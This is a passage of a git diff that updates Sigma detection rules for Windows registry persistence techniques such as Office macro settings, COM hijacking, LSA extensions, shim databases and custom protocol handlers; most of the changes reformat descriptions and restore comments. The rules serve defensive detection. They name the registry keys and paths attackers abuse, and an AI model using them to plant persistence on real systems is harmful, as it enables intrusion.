"EnableUnsafeClientMailRules" - which allows outlook to run applications or execute macros +description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros references: - https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 diff --git a/sigma/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml b/sigma/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml index a4a168bc8..dbfaac982 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml @@ -1,8 +1,8 @@ title: Outlook Security Settings Updated - Registry id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: similar + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd # EnableUnsafeClientMailRules + type: similar status: test description: Detects changes to the registry values related to outlook security settings references: diff --git a/sigma/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml b/sigma/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml index 52115ac6c..66e6846e2 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml @@ -1,11 +1,10 @@ title: Macro Enabled In A Potentially Suspicious Document id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd related: - - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 - type: derived + - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 + type: derived status: experimental -description: Detects registry changes to Office trust records where the path is located - in a potentially suspicious location +description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location references: - https://twitter.com/inversecos/status/1494174785621819397 - Internal Research diff --git a/sigma/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml b/sigma/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml index 25dcc98e6..1507c5b5c 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml @@ -1,12 +1,10 @@ title: Uncommon Microsoft Office Trusted Location Added id: f742bde7-9528-42e5-bd82-84f51a8387d2 related: - - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac - type: derived + - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac + type: derived status: experimental -description: Detects changes to registry keys related to "Trusted Location" of Microsoft - Office where the path is set to something uncommon. Attackers might add additional - trusted locations to avoid macro security restrictions. +description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. references: - Internal Research - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 @@ -43,10 +41,8 @@ detection: ProcessName|contains: - :\Program Files\Microsoft Office\ - :\Program Files (x86)\Microsoft Office\ - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_exclude_*) + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_exclude_*) falsepositives: - - Other unknown legitimate or custom paths need to be filtered to avoid false - positives + - Other unknown legitimate or custom paths need to be filtered to avoid false positives level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml index c7bf152ea..91cede558 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml @@ -1,11 +1,10 @@ title: Office Macros Auto-Enabled id: 91239011-fe3c-4b54-9f24-15c86bb65913 related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: obsoletes + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: obsoletes status: test -description: Detects registry changes to Microsoft Office "VBAWarning" to a value - of "1" which enables the execution of all macros, whether signed or unsigned. +description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml index aee54139c..a55c470ab 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml @@ -1,15 +1,10 @@ title: Potential Persistence Via AppCompat RegisterAppRestart Layer id: b86852fb-4c77-48f9-8519-eb1b2c308b59 status: experimental -description: 'Detects the setting of the REGISTERAPPRESTART compatibility layer on - an application. - - This compatibility layer allows an application to register for restart using the - "RegisterApplicationRestart" API. - +description: | + Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. + This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism. - - ' references: - https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_app_paths.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_app_paths.yml index 21700a0fd..bdd30cbcc 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_app_paths.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_app_paths.yml @@ -1,18 +1,11 @@ title: Potential Persistence Via App Paths Default Property id: 707e097c-e20f-4f67-8807-1f72ff4500d6 status: experimental -description: 'Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App - Paths\ registry. Which might be used as a method of persistence - +description: | + Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. - - First, to map an application''s executable file name to that file''s fully qualified - path. - - Second, to prepend information to the PATH environment variable on a per-application, - per-process basis. - - ' + First, to map an application's executable file name to that file's fully qualified path. + Second, to prepend information to the PATH environment variable on a per-application, per-process basis. references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN @@ -35,6 +28,7 @@ detection: - (Default) - Path NewValue|contains: + # Add more suspicious paths or binaries as you see fit. - \Users\Public - \AppData\Local\Temp\ - \Windows\Temp\ @@ -55,7 +49,6 @@ detection: - .ps1 condition: registry_set and selection falsepositives: - - Legitimate applications registering their binary from on of the suspicious locations - mentioned above (tune it) + - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it) level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml index d065549bc..951fde7c6 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via AutodialDLL id: e6fe26ee-d063-4f5b-b007-39e90aaf50e3 status: experimental -description: Detects change the the "AutodialDLL" key which could be used as a persistence - method to load custom DLL via the "ws2_32" library +description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library references: - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/ - https://persistence-info.github.io/Data/autodialdll.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_chm.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_chm.yml index c143a18e1..9991fc86f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_chm.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_chm.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via CHM Helper DLL id: 976dd1f2-a484-45ec-aa1d-0e87e882262b status: experimental -description: Detects when an attacker modifies the registry key "HtmlHelp Author" - to achieve persistence +description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence references: - https://persistence-info.github.io/Data/htmlhelpauthor.html - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 4958fa026..4448ee8c8 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -1,11 +1,9 @@ title: Potential Persistence Via COM Hijacking From Suspicious Locations id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77 status: experimental -description: Detects potential COM object hijacking where the "Server" (In/Out) is - pointing to a suspicious or unsuale location +description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location references: - - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ - (idea) + - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2023/09/28 @@ -24,12 +22,12 @@ detection: ObjectName|endswith: - \InprocServer32\(Default) - \LocalServer32\(Default) - NewValue|contains: + NewValue|contains: # Add more suspicious paths and locations - \AppData\Local\Temp\ - \Desktop\ - \Downloads\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - - \System32\spool\drivers\color\ + - \System32\spool\drivers\color\ # as seen in the knotweed blog - \Users\Public\ - \Windows\Temp\ - '%appdata%' @@ -37,7 +35,6 @@ detection: - '%tmp%' condition: registry_set and selection falsepositives: - - Probable legitimate applications. If you find these please add them to an exclusion - list + - Probable legitimate applications. If you find these please add them to an exclusion list level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml index 46f6b1f58..88fc8c308 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml @@ -1,8 +1,7 @@ title: Potential PSFactoryBuffer COM Hijacking id: 243380fa-11eb-4141-af92-e14925e77c1b status: experimental -description: Detects changes to the PSFactory COM InProcServer32 registry. This technique - was used by RomCom to create persistence storing a malicious DLL. +description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. references: - https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine - https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml index 8e7b6608e..c44cc174a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml @@ -1,10 +1,7 @@ title: Potential Persistence Via Custom Protocol Handler id: fdbf0b9d-0182-4c43-893b-a1eaab92d085 status: experimental -description: Detects potential persistence activity via the registering of a new custom - protocole handlers. While legitimate applications register protocole handlers - often times during installation. And attacker can abuse this by setting a custom - handler to be used as a persistence mechanism. +description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. references: - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/ author: Nasreddine Bencherchali (Nextron Systems) @@ -26,14 +23,16 @@ detection: filter_main_ms_trusted: NewValue|startswith: URL:ms- filter_main_generic_locations: - ProcessName|startswith: + ProcessName|startswith: # Add more folders to avoid FP - C:\Program Files (x86) - C:\Program Files\ - C:\Windows\System32\ - C:\Windows\SysWOW64\ + # Uncomment This section to add specific Protocol Handler names that are know + # filter_specific: + # Details: 'URL:' condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - Many legitimate applications can register a new custom protocol handler. Additional - filters needs to applied according to your environment. + - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment. level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml index d99170eb3..04fba412d 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Event Viewer Events.asp id: a1e11042-a74a-46e6-b07c-c4ce8ecc239b status: test -description: Detects potential registry persistence technique using the Event Viewer - "Events.asp" technique +description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique references: - https://twitter.com/nas_bench/status/1626648985824788480 - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks @@ -23,6 +22,8 @@ detection: EventID: 4657 Channel: Security selection: + # Covers both "\Policies\" and "\Software\" paths for both "Machine" and "User" level configs + # Also "MicrosoftRedirectionProgramCommandLineParameters" key ObjectName|contains: - \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram - \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_globalflags.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_globalflags.yml index 822f33a7c..5acadb988 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_globalflags.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_globalflags.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via GlobalFlags id: 36803969-5421-41ec-b92f-8500f79c23b0 related: - - id: c81fe886-cac0-4913-a511-2822d72ff505 - type: obsoletes + - id: c81fe886-cac0-4913-a511-2822d72ff505 + type: obsoletes status: test -description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit - keys +description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_ie.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_ie.yml index 90a3034c8..8a6d5c049 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_ie.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_ie.yml @@ -1,10 +1,7 @@ title: Modification of IE Registry Settings id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 status: experimental -description: Detects modification of the registry settings used for Internet Explorer - and other Windows components that use these settings. An attacker can abuse this - registry key to add a domain to the trusted sites Zone or insert javascript for - persistence +description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry @@ -38,6 +35,7 @@ detection: filter_binary: NewValue: Binary Data filter_accepted_documents: + # Spotted during office installations ObjectName|contains: \Accepted Documents\ condition: registry_set and (selection_domains and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_ifilter.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_ifilter.yml index f56214670..4422e678a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_ifilter.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_ifilter.yml @@ -1,11 +1,7 @@ title: Register New IFiltre For Persistence id: b23818c7-e575-4d13-8012-332075ec0a2b status: experimental -description: Detects when an attacker register a new IFilter for an extension. Microsoft - Windows Search uses filters to extract the content of items for inclusion in a - full-text index. You can extend Windows Search to index new or proprietary file - types by writing filters to extract the content, and property handlers to extract - the properties of files +description: Detects when an attacker register a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files references: - https://persistence-info.github.io/Data/ifilters.html - https://twitter.com/0gtweet/status/1468548924600459267 @@ -65,6 +61,7 @@ detection: - \CLSID\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\ filter_generic_paths: ProcessName|startswith: + # We assume if an attacker has access to one of these directories. Then he already has admin. - C:\Windows\System32\ - C:\Program Files (x86)\ - C:\Program Files\ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml index 0c9f716f1..458c5f195 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml @@ -1,13 +1,9 @@ title: Potential Persistence Via LSA Extensions id: 41f6531d-af6e-4c6e-918f-b946f2b85a36 status: experimental -description: 'Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" - to include a custom DLL to achieve persistence via lsass. - - The "Extensions" list contains filenames of DLLs being automatically loaded by - lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. - - ' +description: | + Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. + The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. references: - https://persistence-info.github.io/Data/lsaaextension.html - https://twitter.com/0gtweet/status/1476286368385019906 diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml index 31f06db85..945ff4ee7 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Mpnotify id: 92772523-d9c1-4c93-9547-b0ca500baba3 status: experimental -description: Detects when an attacker register a new SIP provider for persistence - and defense evasion +description: Detects when an attacker register a new SIP provider for persistence and defense evasion references: - https://persistence-info.github.io/Data/mpnotify.html - https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek @@ -22,7 +21,6 @@ detection: ObjectName|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\mpnotify condition: registry_set and selection falsepositives: - - Might trigger if a legitimate new SIP provider is registered. But this is not - a common occurrence in an environment and should be investigated either way + - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml index 497941ebe..ce9f20b95 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via MyComputer Registry Keys id: 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06 status: experimental -description: Detects modification to the "Default" value of the "MyComputer" key and - subkeys to point to a custom binary that will be launched whenever the associated - action is executed (see reference section for example) +description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) references: - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,7 +21,6 @@ detection: ObjectName|endswith: (Default) condition: registry_set and selection falsepositives: - - Unlikely but if you experience FPs add specific processes and locations you - would like to monitor for + - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_natural_language.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_natural_language.yml index 4ea76302e..8b24278ca 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_natural_language.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_natural_language.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via DLLPathOverride id: a1b1fd53-9c4a-444c-bae0-34a330fc7aa8 status: experimental -description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural - Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" - process +description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process references: - https://persistence-info.github.io/Data/naturallanguage6.html - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/ @@ -20,6 +18,10 @@ detection: EventID: 4657 Channel: Security selection_root: + # The path can be for multiple languages + # Example: HKLM\System\CurrentControlSet\Control\ContentIndex\Language\English_UK + # HKLM\System\CurrentControlSet\Control\ContentIndex\Language\English_US + # HKLM\System\CurrentControlSet\Control\ContentIndex\Language\Neutral ObjectName|contains: \SYSTEM\CurrentControlSet\Control\ContentIndex\Language\ selection_values: ObjectName|contains: diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml index e8fec8a09..e1c928058 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Visual Studio Tools for Office id: 9d15044a-7cfe-4d23-8085-6ebc11df7685 status: experimental -description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins - in Office applications. +description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. references: - https://twitter.com/_vivami/status/1347925307643355138 - https://vanmieghem.io/stealth-outlook-persistence/ @@ -29,7 +28,8 @@ detection: filter_image: ProcessName|endswith: - \msiexec.exe - - \regsvr32.exe + - \regsvr32.exe # e.g. default Evernote installation + # triggered by a default Office 2019 installation filter_office: ProcessName|endswith: - \excel.exe diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml index 97e5341b7..fcc3b2618 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via Outlook Today Pages id: 487bb375-12ef-41f6-baae-c6a1572b4dd1 status: experimental -description: Detects potential persistence activity via outlook today pages. An attacker - can set a custom page to execute arbitrary code and link to it via the registry - key "UserDefinedUrl". +description: Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl". references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74 author: Tobias Michalski (Nextron Systems) @@ -33,8 +31,7 @@ detection: - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\ ProcessName|endswith: \OfficeClickToRun.exe - condition: registry_set and (selection_main and 1 of selection_value_* and not - 1 of filter_*) + condition: registry_set and (selection_main and 1 of selection_value_* and not 1 of filter_*) fields: - NewValue falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml index 73fc8bcd4..bd5c37e88 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml @@ -1,11 +1,10 @@ title: Potential WerFault ReflectDebugger Registry Value Abuse id: 0cf2e1c6-8d10-4273-8059-738778f981ad related: - - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd - type: derived + - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd + type: derived status: experimental -description: Detects potential WerFault "ReflectDebugger" registry value abuse for - persistence. +description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. references: - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ @@ -22,7 +21,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|endswith: \Microsoft\Windows\Windows Error Reporting\Hangs\ReflectDebugger condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml index 5a228f5ae..46cdca74b 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Scrobj.dll COM Hijacking id: fe20dda1-6f37-4379-bbe0-a98d400cae90 status: experimental -description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to - get the location of the script to execute +description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_search_order.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_search_order.yml index dab6c194b..a1ffacb1a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_search_order.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_search_order.yml @@ -4,7 +4,7 @@ status: experimental description: Detects potential COM object hijacking leveraging the COM Search Order references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ -author: "Maxime Thiebaut (@0xThiebaut), oscd.community, C\xE9dric Hien" +author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 modified: 2023/09/28 tags: @@ -17,15 +17,16 @@ detection: registry_set: EventID: 4657 Channel: Security - selection: + selection: # Detect new COM servers in the user hive ObjectName|contains: \CLSID\ ObjectName|endswith: \InprocServer32\(Default) filter_main_generic: - NewValue|contains: + NewValue|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' - '%%systemroot%%\SysWow64\' filter_main_onedrive: NewValue|contains: + # Related To OneDrive - \AppData\Local\Microsoft\OneDrive\ - \FileCoAuthLib64.dll - \FileSyncShell64.dll diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database.yml index b8fae6e0f..3378e8b38 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database.yml @@ -1,14 +1,9 @@ title: Potential Persistence Via Shim Database Modification id: dfb5b4e8-91d0-4291-b40a-e3b0d3942c45 status: experimental -description: 'Adversaries may establish persistence and/or elevate privileges by executing - malicious content triggered by application shims. - - The Microsoft Windows Application Compatibility Infrastructure/Framework (Application - Shim) was created to allow for backward compatibility of software as the operating - system codebase changes over time - - ' +description: | + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. + The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml index 9d5f62be0..ec639616f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml @@ -1,8 +1,7 @@ title: Suspicious Shim Database Patching Activity id: bf344fea-d947-4ef4-9192-34d008315d3a status: experimental -description: Detects installation of new shim databases that try to patch sections - of known processes for potential process injection or persistence. +description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/ - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml index 09ef27c25..7456f8f60 100644 --- 